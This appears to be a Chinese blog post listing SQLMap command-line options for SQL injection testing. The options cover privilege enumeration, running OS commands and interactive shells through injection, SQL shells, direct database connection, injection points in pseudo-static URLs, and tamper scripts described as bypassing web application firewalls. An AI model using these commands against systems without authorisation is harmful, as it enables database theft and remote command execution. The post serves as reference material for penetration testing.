【信息安全服务】SQLMap 工具参数

1.测试注入点权限

sqlmap.py -u [URL] --privileges // 测试所有用户的权限
sqlmap.py -u [URL] -- privileges -U sa //测试sa用户权限

注:SQLmap命令区分大小写,-u和-U是两个参数

2.执行Shell命令

sqlmap.py -u  [URL] --os-cmd="net user" //执行net user 命令
sqlmap.py -u  [URL] --os-shell //系统交互的shell

3.获取当前数据库名称

sqlmap.py -u [URL]  --current-db

4.执行SQL命令

sqlmap.py -u [URL]  --sql-shell //返回SQL交互的shell,可以执行SQL语句
sqlmap.py -u [URL] --sql-query="sql"

5.POST提交方式

sqlmap.py -u [URL] --data "POST参数"

6.显示详细的等级

sqlmap.py -u [URL] --dbs -v 1
-v 参数包含以下7个等级:
·0:只显示Python的回溯、错误和关键信息;
·1:显示信息和警告信息;
·2:显示调试信息;
·3:有效载荷注入;
·4:显示HTTP请求;
·5:显示HTTP响应头;
·6:显示HTTP响应页面的内容。

7.注入HTTP请求

sqlmap.py -r head.txt --dbs //head.txt内容为HTTP请求

head.txt 内容如下:
 

POST /login.php HTTP/1.1
Host:www.secbug.org
User-Agent:Mozilla/5.0

username=admin&password=admin888

8.直接连接到数据库

sqlmap.py -d "mysql://admin:admin@192.168.1.8:3306/testab" --dbs

9.注入等级

sqlmap.py -u [URL] --level 3

10.将注入语句插入到指定位置

sqlmap.py -u "http:.//www.xxser.com/id/2*.html" --dbs

注:这一用法常用来伪静态注入。

11.使用SQLMap插件

sqlmap.py -u [URL] -tamper "space2morehash.py

注:常用来绕过WAF

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Keyli0n

赠人玫瑰 手有余香

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值